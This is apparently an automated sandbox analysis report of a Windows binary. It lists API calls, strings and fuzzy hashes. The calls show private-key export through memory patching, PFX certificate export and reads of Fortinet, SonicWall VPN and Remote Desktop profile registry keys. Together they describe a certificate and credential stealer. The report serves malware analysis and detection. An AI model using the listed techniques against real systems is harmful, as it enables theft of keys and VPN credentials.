7ff7cb87ec2f 5172->5175 5178 7ff7cb8725dc GetProcessHeap HeapAlloc 5173->5178 4413 7ff7cb8731c4 4414 7ff7cb8731d7 4413->4414 4415 7ff7cb871990 4 API calls 4414->4415 4416 7ff7cb8731e2 4415->4416 4417 7ff7cb871990 4 API calls 4416->4417 4418 7ff7cb8731f1 CertEnumSystemStoreLocation 4417->4418 4419 7ff7cb871990 4 API calls 4418->4419 4420 7ff7cb873215 4419->4420 5179 7ff7cb87e600 lstrcpyW PathAppendW 5180 7ff7cb87e640 5179->5180 5181 7ff7cb87ccf4 6 API calls 5180->5181 5183 7ff7cb87e65c 5181->5183 5182 7ff7cb87e6c7 5183->5182 5184 7ff7cb871990 4 API calls 5183->5184 5185 7ff7cb87e678 5184->5185 5186 7ff7cb8719e4 4 API calls 5185->5186 5187 7ff7cb87e683 5186->5187 5188 7ff7cb871990 4 API calls 5187->5188 5189 7ff7cb87e69b 5188->5189 5190 7ff7cb8719e4 4 API calls 5189->5190 5191 7ff7cb87e6ab 5190->5191 5192 7ff7cb871990 4 API calls 5191->5192 5193 7ff7cb87e6ba 5192->5193 5194 7ff7cb8725b4 2 API calls 5193->5194 5194->5182

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF7CB87924D
                                                                          • Part of subcall function 00007FF7CB8725DC: GetProcessHeap.KERNEL32(?,?,?,00007FF7CB871985,?,?,?,00007FF7CB87155F), ref: 00007FF7CB8725E5
                                                                          • Part of subcall function 00007FF7CB8725B4: GetProcessHeap.KERNEL32 ref: 00007FF7CB8725C1
                                                                          • Part of subcall function 00007FF7CB8725B4: HeapFree.KERNEL32 ref: 00007FF7CB8725CF
                                                                        • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF7CB8793AB
                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF7CB8793C0
                                                                        • TerminateProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF7CB8793EF
                                                                          • Part of subcall function 00007FF7CB87968C: PeekNamedPipe.KERNELBASE ref: 00007FF7CB8796B8
                                                                        • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF7CB879421
                                                                        • GetExitCodeProcess.KERNELBASE ref: 00007FF7CB879460
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: ProcessTime$Heap$FileObjectSingleSystemWait$CodeExitFreeNamedPeekPipeTerminate
                                                                        • String ID: & echo
                                                                        • API String ID: 2711250446-3491486023
                                                                        • Opcode ID: f92ee800b1b5a381f7537eb51654d869d3388ac1e002b9d5a8edb654dcec901f
                                                                        • Instruction ID: f1f3b4602660c41a43eb6dcc457bac1af7866b2f85ac833e43a63e4e2c84ad03
                                                                        • Opcode Fuzzy Hash: f92ee800b1b5a381f7537eb51654d869d3388ac1e002b9d5a8edb654dcec901f
                                                                        • Instruction Fuzzy Hash: B2517425A0965292EE20FF19E4446BAE3D1FF84BA4F841031FA4E576A5DF3CE495C3A0

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: Initialize$CreateInstanceSecurity
                                                                        • String ID:
                                                                        • API String ID: 89549506-0
                                                                        • Opcode ID: b06b60c75a0e364457e69cf4407a40afd88aa559a7b63d120074e74016c78773
                                                                        • Instruction ID: 96836389c7bdf5ae4d86b112430b2b89b417f8ce70d1a51683ec38c9a86ad2f9
                                                                        • Opcode Fuzzy Hash: b06b60c75a0e364457e69cf4407a40afd88aa559a7b63d120074e74016c78773
                                                                        • Instruction Fuzzy Hash: 7A118873A28640CBF3109F61E8593AE7774F34870DFA08218EA492A998CF3DD255CB94

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: #qGq$$q*q$<9#$
                                                                        • API String ID: 0-163940422
                                                                        • Opcode ID: 52f61a20b0194fcb18550ca330a575ad691ed636dab6f24800a5f7c021c40964
                                                                        • Instruction ID: c20b7466cde168e6e8a613a8097b55299a4db59e08bc1e81f34c58533671ac1b
                                                                        • Opcode Fuzzy Hash: 52f61a20b0194fcb18550ca330a575ad691ed636dab6f24800a5f7c021c40964
                                                                        • Instruction Fuzzy Hash: 8A4280A1B482A14AEB00FFA984052FDA7E29B457DCB941035FE4D3BB5ADF3C9155C3A0

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetProcessHeap.KERNEL32(?,?,?,00007FF7CB871951,?,?,00000000,00007FF7CB8719BA), ref: 00007FF7CB872669
                                                                        • RtlReAllocateHeap.NTDLL(?,?,?,00007FF7CB871951,?,?,00000000,00007FF7CB8719BA), ref: 00007FF7CB87267A
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$AllocateProcess
                                                                        • String ID:
                                                                        • API String ID: 1357844191-0
                                                                        • Opcode ID: be938404752c85019b6f44b0f5e5ed4010620d834be4c87ef3aa5fcdd3d15046
                                                                        • Instruction ID: 4bb0bebbb0910e14ce13e639b7da914db1b82d98f56d16e52a13795bcc2ef2e9
                                                                        • Opcode Fuzzy Hash: be938404752c85019b6f44b0f5e5ed4010620d834be4c87ef3aa5fcdd3d15046
                                                                        • Instruction Fuzzy Hash: CBE08615B0859282E948FF9AB990075A1A1AF49FE4F889130FD0E17765DE2CD4A14790

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • CertEnumCertificatesInStore.CRYPT32 ref: 00007FF7CB872D90
                                                                        • CertGetNameStringW.CRYPT32 ref: 00007FF7CB872DD3
                                                                        • CertNameToStrW.CRYPT32 ref: 00007FF7CB872EB8
                                                                        • CertNameToStrW.CRYPT32 ref: 00007FF7CB872F0A
                                                                        • FileTimeToSystemTime.KERNEL32 ref: 00007FF7CB872F4B
                                                                        • FileTimeToSystemTime.KERNEL32 ref: 00007FF7CB872FC1
                                                                          • Part of subcall function 00007FF7CB871A70: wvsprintfW.USER32 ref: 00007FF7CB871AA9
                                                                          • Part of subcall function 00007FF7CB8725B4: GetProcessHeap.KERNEL32 ref: 00007FF7CB8725C1
                                                                          • Part of subcall function 00007FF7CB8725B4: HeapFree.KERNEL32 ref: 00007FF7CB8725CF
                                                                        • CertEnumCertificatesInStore.CRYPT32 ref: 00007FF7CB873178
                                                                          • Part of subcall function 00007FF7CB873220: CertGetCertificateContextProperty.CRYPT32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CB872C48), ref: 00007FF7CB87325E
                                                                          • Part of subcall function 00007FF7CB873220: CryptAcquireCertificatePrivateKey.CRYPT32 ref: 00007FF7CB87328D
                                                                          • Part of subcall function 00007FF7CB873220: CryptGetUserKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CB872C48), ref: 00007FF7CB8732BB
                                                                          • Part of subcall function 00007FF7CB873220: LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CB872C48), ref: 00007FF7CB873336
                                                                          • Part of subcall function 00007FF7CB873220: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CB872C48), ref: 00007FF7CB873380
                                                                          • Part of subcall function 00007FF7CB873220: VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CB8733AC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: Cert$Time$Name$CertificateCertificatesCryptEnumFileHeapStoreSystem$AcquireAddressContextFreeLibraryLoadPrivateProcProcessPropertyProtectStringUserVirtualwvsprintf
                                                                        • String ID: 1.2.840.113549
                                                                        • API String ID: 2787208766-3888290641
                                                                        • Opcode ID: 8b73c42670ea8246c3f00f00a15c13dc80e28ec0ccd241d0236bafc5b6063659
                                                                        • Instruction ID: 8968d99f913e4fdfe2ada4c91b7664842ea367aeb879ab0ae441f578c23445af
                                                                        • Opcode Fuzzy Hash: 8b73c42670ea8246c3f00f00a15c13dc80e28ec0ccd241d0236bafc5b6063659
                                                                        • Instruction Fuzzy Hash: 07B18262A0865285EB50FF5AD4412BEE7A1FB85BD8F800031FA8D17B69DF3CD155CB90

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: CreateErrorLast$Pipe$CloseHandleProcess
                                                                        • String ID:
                                                                        • API String ID: 2620922840-0
                                                                        • Opcode ID: e7471855f41c6a413a1e0a14d76814eaea720c7982075b5bda5c61cbaa643e0a
                                                                        • Instruction ID: 0e11febab4314407afc030a4c56ceab004938f65c608a28e342dc09d0a9687ba
                                                                        • Opcode Fuzzy Hash: e7471855f41c6a413a1e0a14d76814eaea720c7982075b5bda5c61cbaa643e0a
                                                                        • Instruction Fuzzy Hash: 1C514F32B18A1296EB50FF69D4847EC63E1AB587ACF810035FE0D6AA65DF3CD159C390

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: Cert$NameStore$CertificatesCloseEnumOpenString
                                                                        • String ID: )qnq$dqyq$yqyq
                                                                        • API String ID: 3617724111-466822987
                                                                        • Opcode ID: 9ae85fb58035b556ed7740a638f834076978180fa08e68d9f74bd72b5be20427
                                                                        • Instruction ID: a104a24208e40ed4624f4d7eede31f379a4f78b9d9ec1c3a864355805ecf6643
                                                                        • Opcode Fuzzy Hash: 9ae85fb58035b556ed7740a638f834076978180fa08e68d9f74bd72b5be20427
                                                                        • Instruction Fuzzy Hash: 4821C772A1869282EB50FF1AE8403AAF3A1FBC4794F845031FA8D57769DF3CD4558B90

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: CertEnumStoreSystem
                                                                        • String ID: ":{$"_":""
                                                                        • API String ID: 4132996702-2026347918
                                                                        • Opcode ID: bde7b9d95764b4a748e3e44d944acbe1370a7a94fc7036fd8cfb648fe9c63810
                                                                        • Instruction ID: 3c15beb3f8f56db79b6c0d9383330d9d5e11f77da701c96c77b1b28a4b3ebbba
                                                                        • Opcode Fuzzy Hash: bde7b9d95764b4a748e3e44d944acbe1370a7a94fc7036fd8cfb648fe9c63810
                                                                        • Instruction Fuzzy Hash: 8301A711E4866142FA44FF1AA4002B993D5AF98BE4FC85031FD1D17B7A8F2CD1A38390

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: CertEnumLocationStoreSystem
                                                                        • String ID: "_": ""
                                                                        • API String ID: 863500693-1453221996
                                                                        • Opcode ID: 6b21618263e360399a06e9a6e29e51c669755cc20520e873ad7292844cdbbc9a
                                                                        • Instruction ID: 1131989edacf9d4f681483825ceba0e28997f4b6ec6d0441fc173a5e4121752a
                                                                        • Opcode Fuzzy Hash: 6b21618263e360399a06e9a6e29e51c669755cc20520e873ad7292844cdbbc9a
                                                                        • Instruction Fuzzy Hash: 8AE06541B9851341EE84BF6AA8112F493955F997E4FC82031F81E16376DF2CD0E683A0

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: FileNamedPeekPipeRead
                                                                        • String ID:
                                                                        • API String ID: 327342812-0
                                                                        • Opcode ID: 096132fb93717013b3e16f88d7bf0609256235cc15a0420f845206ceb18e82a6
                                                                        • Instruction ID: 3b0d50f197b92fa516dab725f68e57cab916617572d8f3c53cd115195f230a71
                                                                        • Opcode Fuzzy Hash: 096132fb93717013b3e16f88d7bf0609256235cc15a0420f845206ceb18e82a6
                                                                        • Instruction Fuzzy Hash: 5D01AD2271825283EB10EF1AE44577AE3E0EB85BE8F944134FA488B664DF7CD4908B90

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: CodeExitNamedObjectPeekPipeProcessSingleWait
                                                                        • String ID:
                                                                        • API String ID: 2021502500-0
                                                                        • Opcode ID: 219911f9fbf93e8dc81b8ab5b15ed7b90f6e7e4d0e94d35a3e310abd07cbe8cc
                                                                        • Instruction ID: a7600a9eef83b2c1ff4ee82f58692b9f8c2460dbd80e9ee6a0c7e24981c2ab2a
                                                                        • Opcode Fuzzy Hash: 219911f9fbf93e8dc81b8ab5b15ed7b90f6e7e4d0e94d35a3e310abd07cbe8cc
                                                                        • Instruction Fuzzy Hash: D8018421A0865292EF50EF29D48077853D1EF44B9CF945231F90D565A9EF2DDCE5C390

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 682 7ff7cb871a70-7ff7cb871ab8 call 7ff7cb871918 wvsprintfW
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: wvsprintf
                                                                        • String ID:
                                                                        • API String ID: 2795597889-0
                                                                        • Opcode ID: 1ee19605ac26c83bc426fe2672bc05ad22fbb01a022c874d8b8b7949f4abed9f
                                                                        • Instruction ID: b9d6df6b6ddbee4c94f17f7a5e20e680707219e710edbf381c98a30939e46ea5
                                                                        • Opcode Fuzzy Hash: 1ee19605ac26c83bc426fe2672bc05ad22fbb01a022c874d8b8b7949f4abed9f
                                                                        • Instruction Fuzzy Hash: 44E039B2A40B45C2D704AF19E94008CBBB5EB99FD8B948021DB481B325CF38D9A6C7A0

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 685 7ff7cb8779c4-7ff7cb8779d9 GetNativeSystemInfo 686 7ff7cb8779db-7ff7cb8779e1 685->686 687 7ff7cb8779e7 685->687 686->687 688 7ff7cb8779e3-7ff7cb8779e5 686->688 689 7ff7cb8779e9-7ff7cb8779ed 687->689 688->689
                                                                        APIs
                                                                        • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00007FF7CB8774DE), ref: 00007FF7CB8779CD
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: InfoNativeSystem
                                                                        • String ID:
                                                                        • API String ID: 1721193555-0
                                                                        • Opcode ID: 6118cf754c1c705de9ec470bc179da628b291e502bfd3552ff041d694441724e
                                                                        • Instruction ID: d95de6f083f6698a88afea1591ab43be7ce0859bf3b6ab9646dc960674082255
                                                                        • Opcode Fuzzy Hash: 6118cf754c1c705de9ec470bc179da628b291e502bfd3552ff041d694441724e
                                                                        • Instruction Fuzzy Hash: 6CD05E07C0849282DE31BF089406136A2E1BB6471CFC00231F18D024B06FADD6F9DAA5
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: File$Path$ExistsHeap$AppendCreateEnvironmentProcessReadSizeVariable$CombineFreeQuoteSpaceslstrcatlstrlen
                                                                        • String ID: ", "group": "$", "host": "$"user": "$</DefaultGroup>$</DefaultHostName>$</DefaultUser>$<DefaultGroup>$<DefaultHostName>$<DefaultUser>$Software\Fortinet\FortiClient\Sslvpn\Tunnels$Software\Microsoft\Terminal Server Client\Servers$Software\SonicWALL\SSL-VPN NetExtender\Standalone\Profiles$Software\SonicWall\SSL-VPN NetExtender\Standalone$]},$}},
                                                                        • API String ID: 2508640211-1951492331
                                                                        • Opcode ID: 948f672f832970001278ee64c14b3cd2eb97a0324b026afad294e905e837156c
                                                                        • Instruction ID: b4e215a2b1fa154bf9862ce397a5f5bbed197ee74c3442f0997fdc46d4d42a8c
                                                                        • Opcode Fuzzy Hash: 948f672f832970001278ee64c14b3cd2eb97a0324b026afad294e905e837156c
                                                                        • Instruction Fuzzy Hash: 4F12E361A1866241EA50FF29D4503FDA3E1AF857E8FC04031FA0D1BABADF2DD165C3A0
                                                                        APIs
                                                                        • CertGetCertificateContextProperty.CRYPT32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CB872C48), ref: 00007FF7CB87325E
                                                                        • CryptAcquireCertificatePrivateKey.CRYPT32 ref: 00007FF7CB87328D
                                                                        • CryptGetUserKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CB872C48), ref: 00007FF7CB8732BB
                                                                          • Part of subcall function 00007FF7CB8736F0: CryptExportKey.ADVAPI32 ref: 00007FF7CB873744
                                                                          • Part of subcall function 00007FF7CB8736F0: CryptExportKey.ADVAPI32 ref: 00007FF7CB87379E
                                                                        • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CB872C48), ref: 00007FF7CB873336
                                                                        • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CB872C48), ref: 00007FF7CB873380
                                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CB8733AC
                                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CB8733DC
                                                                        • CryptExportKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CB873404
                                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CB87341C
                                                                        • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CB87343F
                                                                        • CryptAcquireContextA.ADVAPI32 ref: 00007FF7CB873459
                                                                        • CryptImportKey.ADVAPI32 ref: 00007FF7CB87347E
                                                                        • OpenSCManagerA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CB872C48), ref: 00007FF7CB8734B5
                                                                        • OpenServiceA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CB872C48), ref: 00007FF7CB873505
                                                                        • QueryServiceStatusEx.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CB872C48), ref: 00007FF7CB873523
                                                                        • OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CB872C48), ref: 00007FF7CB873532
                                                                        • ReadProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CB872C48), ref: 00007FF7CB87355D
                                                                        • ReadProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CB872C48), ref: 00007FF7CB87357C
                                                                        • WriteProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CB87359F
                                                                        • NCryptExportKey.NCRYPT ref: 00007FF7CB873605
                                                                        • CertOpenStore.CRYPT32 ref: 00007FF7CB873667
                                                                        • CertAddCertificateLinkToStore.CRYPT32 ref: 00007FF7CB873682
                                                                        • CertSetCertificateContextProperty.CRYPT32 ref: 00007FF7CB87369E
                                                                        • PFXExportCertStoreEx.CRYPT32 ref: 00007FF7CB8736BD
                                                                        • PFXExportCertStoreEx.CRYPT32 ref: 00007FF7CB8736DF
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmp
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmp
